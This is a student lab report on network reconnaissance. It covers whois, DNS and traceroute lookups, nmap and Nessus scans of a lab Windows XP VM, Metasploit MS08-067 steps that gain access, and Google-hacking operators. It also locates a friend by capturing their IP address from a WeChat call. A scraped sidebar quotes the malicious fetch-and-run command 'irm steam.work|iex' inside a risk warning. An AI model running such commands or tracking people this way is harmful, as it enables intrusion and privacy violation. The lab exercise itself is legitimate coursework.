20232323 2024-2025-1《网络与系统攻防技术》实验五实验报告

news/2025/11/16 20:57:00/文章来源:https://www.cnblogs.com/showmaker77/p/19229019

1.实验内容
任务1:DNS域名信息查询
任务2:获取好友IP地址及地理地址
任务3:使用nmap扫描靶机
任务4:使用Nessus扫描靶机
任务5:网络足迹与Google hacking
2.实验目的
通过一系列网络安全工具和技术手段,深入了解网络安全领域的关键技能和概念,同时增强对个人信息安全的保护意识。
4.实验过程与分析
    4.1 对baidu.com进行DNS域名查询,获取信息
    4.1.1 查询DNS注册人及联系方式
    在kali虚拟机中输入命令whois baidu.com,查询该域名的注册信息。

image
image

从图中可得信息:
注册人组织:北京百度网讯科技有限公司
注册人国家:中国
注册域名ID:11181110_DOMAIN_COM-VRSN
注册商:MarkMonitor Information Technology (Shanghai) Co., Ltd.
注册商IANA ID:3838
注册机构:MarkMonitor Inc.
4.1.2 查询对应域名的IP地址
    输入命令dig baidu.com查询DNS解析信息
image

输入命令nslookup baidu.com查询域名的DNS信息
image

4.1.3 查询IP地址注册信息
使用whois命令查询P地址110.242.74.102
image

从图可知信息:IP地址段: 110.240.0.0-110.255.255.255
网络名称: UNICOM-HE
所属机构: China Unicom Hebei province network
image

组织名称: China Mobile
    地址: no.21,financial street
    电话: +000000000
    image

技术联系人: chinaunicon hostmaster
    联系人邮箱: hqs-ipabuse@chinaunicom.cn
    联系人电话: +86 10 66259764
联系人传真: +86 10 66259764
image

状态: ALLOCATED PORTABLE
最后修改时间: 2023-10-21T03:38:51Z
数据来源: APNIC
whois命令查询IP地址124.237.177.164:
image

IP地址段: 124.236..0.0-124.239.255.255
网络名称: CHINANET-HE
所属机构: CHINANET hebei province network

image
image
image

4.1.4 跟踪网络路由
输入traceroute baidu.com命令,可以追踪到数据包从本机到目标主机所经过的路径
image

第18跳到达目的地110.242.74.102,程序此时停止
4.1.5 获取IP地址注册位置
    使用“UU在线工具”查询IP地址的具体位置,IP110.242.74.102和124.237.177.164
image

image

4.2 尝试获取一位好友的IP地址与具体地理位置
    4.2.1 获取IP地址
    让微信好友给我打语音电话,然后开启wireshark抓包,使用命令udp and ip.addr==172.16.177.142筛选IP为主机地址,并且传输协议为UDP的数据包。
image

4.2.2 查询地理位置
image

如图所示
4.3 使用nmap开源软件对靶机环境进行扫描
    使用WinXP虚拟机作为靶机,Kali虚拟机作为攻击机。先查询ip地址
image
image

4.3.1 检查靶机IP地址是否活跃
    输入命令nmap -sn 192.168.239.144进行ping扫描,查询靶机是否在线
image

4.3.2 检查靶机IP地址开放的端口
    输入命令nmap -sS 192.168.239.144进行SYN扫描,查询靶机开放的TCP端口
image

输入命令nmap -sU 192.168.239.144进行UDP扫描,查询靶机开放的UDP端口
image

4.3.3靶机安装的操作系统及版本
    输入命令nmap -O 192.168.239.144,查询靶机安装的操作系统及版本。
image

4.3.4靶机安装的服务
    输入命令nmap -sV 192.168.239.144,查询靶机安装的服务
image

4.4 用Nessus开源软件对靶机环境进行扫描
    4.4.1靶机上开放的端口
    在Kali虚拟机上下载nessus,安装完成后根据教程输入ip地址扫描,结果如图
image

扫描结果显示,靶机开放的端口有135、139、445端口
 4.4.2靶机各个端口上网络服务存在的安全漏洞
    创建Advanced Scan高级扫描,使用同样的方式进行配置,并进行扫描。
image

Severity(严重程度):用不同颜色标识漏洞级别,从高到低通常对应 “Critical(严重)”“High(高)”“Medium(中)”“Low(低)” 等,颜色越深代表威胁越大。
CVSS(通用漏洞评分系统):是衡量漏洞严重程度的数值标准,分数越高风险越高(0 - 10 分,通常 7 分以上为高风险)。
VRR(可能是漏洞修复优先级或相关评级)、MPS(可能是漏洞影响评分或其他 metric):辅助评估漏洞影响的指标。
Name(漏洞名称):
例如 “Microsoft Windows Unauthorized Installation Detection”(微软 Windows 未授权安装检测漏洞)、“SMBv1 Windows Multiple Issues”(SMBv1 协议的多个 Windows 问题)等,明确漏洞类型。
Family(漏洞所属类别):如 “Windows”“General”“Ports” 等,区分漏洞针对的系统或领域。
Count(数量):该类漏洞在主机上的出现次数。
Host details(主机详情):显示主机 IP、操作系统(如 “Microsoft Windows Server 2019 Datacenter...”)、检测时间等信息。
4.4.3攻陷靶机环境,获得系统访问权的方法
根据扫描结果,我们可以利用445端口上的MS08-067、MS17-010漏洞获得系统访问权。
o进入msf控制界面,输入search MS08-067搜索漏洞载荷并选取Windows Xp sP3 chinese - simplified (NX)环境,在配置过程中输入set rhost 192.168.239.144(靶机IP)即可开始监听
image

image

访问权获得:
image

4.5 搜索测试
    4.5.1 搜索自己在网上的足迹
image
image

4.5.2 练习使用Google hack搜集技能完成搜索
(1)site:指定域名 用于搜索指定网站或域名的资源
image

(2)info:指定域名 用于查询网站的基础信息
image

(3)intext:限定关键字 用于限定关键字
image

4)intitle:匹配关键字
image

(5)allintitle:查找标题中同时包含多个关键词的页面
image

(6)inurl:匹配关键字
image

7)filetype:匹配文件类型
image

(8)ext:限定搜索特定类型的网页扩展名
image

(9)OR用于扩大搜索范围
image

(10)*通配符匹配任何未知词
image

5.问题及解决
问题一:使用nessus扫描时,扫描不到端口
解决方法:发现winxp的防火墙没有关闭,关闭后可扫描得到
6.心得体会
本次网络安全实验让我对信息搜集技术有了全新认知。我通过实操掌握了域名分析、IP 及注册信息 / 地理位置查询、抓包获取好友 IP 并分析位置的方法,还运用 nmap 和 nessus 工具完成靶机环境探测与漏洞分析,同时学会了高级搜索技巧。
实验中遇到的问题,我通过查资料、咨询 AI 大多得以解决。这次经历让我深刻体会到信息搜集技术的实用性和网络安全的重要性,所学技能将助力后续网络与系统攻防技术学习,也让我意识到持续学习、实践和不断进步的必要性。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/967346.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

AI元人文:价值权衡的双模引擎与五维元问——构建人机共生的存在语法

AI元人文:价值权衡的双模引擎与五维元问——构建人机共生的存在语法 笔者:岐金兰 日期:2025年11月16日 摘要 在人工智能深度参与文明决策的元时代,我们面临的核心挑战从技术实现转向价值协调。本文系统论述AI元人文…

make

LOVE Originally, English is also a pictographic script. so English just dont like people are not similar with them.

Spring Cloud - Spring Cloud 注册中心与服务提供者(Spring Cloud Eureka 概述、微服务高效入门、微服务应用实例)

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

DateUtil

点击查看 import org.junit.Test;import java.time.*; import java.time.format.DateTimeFormatter; import java.time.temporal.ChronoUnit; import java.time.temporal.TemporalAdjusters; import java.time.tempora…

(链表)找单链表倒数第k个结点

5.找单链表倒数第k个结点 Node* Get_Kth_Node(Node* plist, int k) { Node* p = plist; Node* q = plist;for (int i = 0; i < k; i++)q = q->next;while (q != NULL) {p = p->next;q = q->next; }return …

(链表)判断是否回文

4.判断是否回文 std::stack<Node*> st; int len = GetLength(plist);Node* p = plist->next; for (int i = 0; i < len / 2; i++) {st.push(p);p = p->next; }if (len % 2 != 0)p = p->next;while (…

和为定值的子集数 25-11-16

和为定值的子集数 |递归|二叉树| 本题思维可以扩展到类似的题中,例如:子集和、子集积、排列组合类问题 其中:该题用到未知数组长度的读取,个人认为用stringstream会比之前的string然后一个一个读入方便很多 主要思…

(链表)判断两个单链表是否存在交点

2.判断两个单链表是否存在交点,如果存在交点,则找到相交的一点。 (1)只需判断是否相交 用两个分别跑到单链表的未结点处,然后判断是否是同一个尾结点即可 (2)指出具体的相交的结点是什么 先统计两个单链表长度,然…

(链表)逆置

1.逆置 (1)借助头结点 (2)不借助头结点 (3)(详情见project6) //0.判空处理 empty if (Is_Empty(plist)) return; //1.申请三个指针pqr,先给p和q赋值 r不着急 Node* p = plist->next; Node* q = p->next; Node…

(链表)任意删除一个结点

3.任意删除一个结点(要求时间复杂读为o(1)),给的这个节点的地址不能是尾结点(这个结点是无法找到上家的) //0.做判断:p不能是尾结点 if (p->next == NULL) return false; //1.申请一个指针q,用来指向p的下一…

在抖音直播推广开源作品的可行性?

一、前言作为85后,.NET开发已经有20年头了,人已经步入中年了,打工生涯也应该结束了,作为.NET微服务先驱者,2017年就开始研发surging, 然后在github开源,不出两年star 已经突破3k,star 的增加,代表了大多数人认可…

分布式监控体系:从指标采集到智能告警的完整之道 - 实践

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

hot 100 (1)—— 两数之和(哈希) - 指南

hot 100 (1)—— 两数之和(哈希) - 指南pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", &quo…

DLSS Swapper商业模式:开源软件商业化探索 - 指南

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

性能优化体系化建设:BI平台的深度优化实践

第一部分:最复杂的性能优化经历——BI数据大盘加载卡顿 1. 问题背景与建立监控基线:场景:OMNIEYE平台的核心数据看板,用户配置了多个图表,一次性拉取并渲染数万行、数十列的数据,导致:API响应时间极长(超过10s…

AT_jsc2019_qual_e Card Collector题解

博客地址 图论建模还是太神仙了。 首先思考一下题目给的条件,每行只选一个,接着每列只选一个,由于这种唯一对应的性质,很容易让人想到二分图匹配,但数据范围并不允许我们这样做。 但这给我们一个图论建模的思路。…

20251115ACC

比赛链接 赛时 难绷 先通读四道题,T2有一个反悔贪心的思路,T3一眼差分,T1应该不会太难,心态良好。 于是直接开T1。思考近45min后想到直接硬拆绝对值,开始码。结果由于自己前期思路不严谨和代码实现问题,硬调2.5h才过…

Day40(10)-F:\硕士阶段\Java\课程代码\后端\web-ai-code\web-ai-project01\springboot-mybatis-quickstart

Mybatispublic class HikariDataSource extends HikariConfig implements DataSource, Closeable {private static final Logger LOGGER = LoggerFactory.getLogger(HikariDataSource.class);private final AtomicBool…

还能回到原先吗 绞尽脑汁翻阅文献 这名为爱的实验 被等号连接

test40 教练模拟器真好玩 /kel俄罗斯方块 旋转一下然后计数,注意对对称图形去重喵。 #pragma GCC optimize(1,2,3,"Ofast","inline") #include<bits/stdc++.h> #define int long long #def…

irm steam.work|iex 风险分析

一个高风险的恶意命令。 执行此命令将严重危害您的计算机安全和您的 Steam 帐户。 风险分析:irm steam.work|iex这个命令由三个部分组成,组合起来非常危险:irm steam.workirm 是 Invoke-RestMethod 的别名,这是一个…